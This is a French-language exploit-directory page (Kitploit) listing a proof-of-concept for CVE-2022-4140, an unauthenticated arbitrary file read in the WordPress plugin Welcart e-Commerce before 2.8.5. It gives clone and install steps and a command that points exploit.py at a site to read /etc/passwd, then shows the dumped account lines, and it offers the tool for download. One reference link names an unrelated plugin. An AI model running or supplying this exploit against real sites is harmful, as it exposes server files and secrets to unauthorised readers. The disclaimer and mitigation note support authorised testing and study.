Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-4140 — WordPress plugin Welcart e-Commerce < 2.8.5 - Lecture arbitraire de fichiers | Kitploit
Outils/GitHubGitHub/anirbala98/cve-2022-4140
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubanirbala98/cve-2022-4140

CVE-2022-4140

WordPress plugin Welcart e-Commerce < 2.8.5 - Lecture arbitraire de fichiers

Voir le dépôt
il y a 22h 59mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-4140 - Plugin WordPress Welcart e-Commerce < 2.8.5 - Lecture arbitraire de fichiers

Ce dépôt contient une preuve de concept (PoC) pour l'exploitation de la CVE-2022-4140.

Avertissement

Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester.

Présentation

Le plugin ne valide pas la saisie utilisateur avant de l'utiliser pour afficher le contenu d'un fichier, ce qui pourrait permettre à un attaquant non authentifié de lire des fichiers arbitraires sur le serveur.

Version concernée

ComposantVersion
Plugin vulnérable<=2.8.4
Plugin corrigé2.8.5

Prérequis

  • Python 3.13.14
  • Requests 2.32.5

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exploit.py <base_url> -f <emplacement_du_fichier> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Exemple

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Vérification si la cible est vulnérable
[+] Version du plugin détectée : 2.8.4
[+] La cible est vulnérable

[*] Tentative de lecture d'un fichier arbitraire

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Atténuation

Mettez à niveau le plugin vers la version 2.8.5.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  • https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
Télécharger l’outil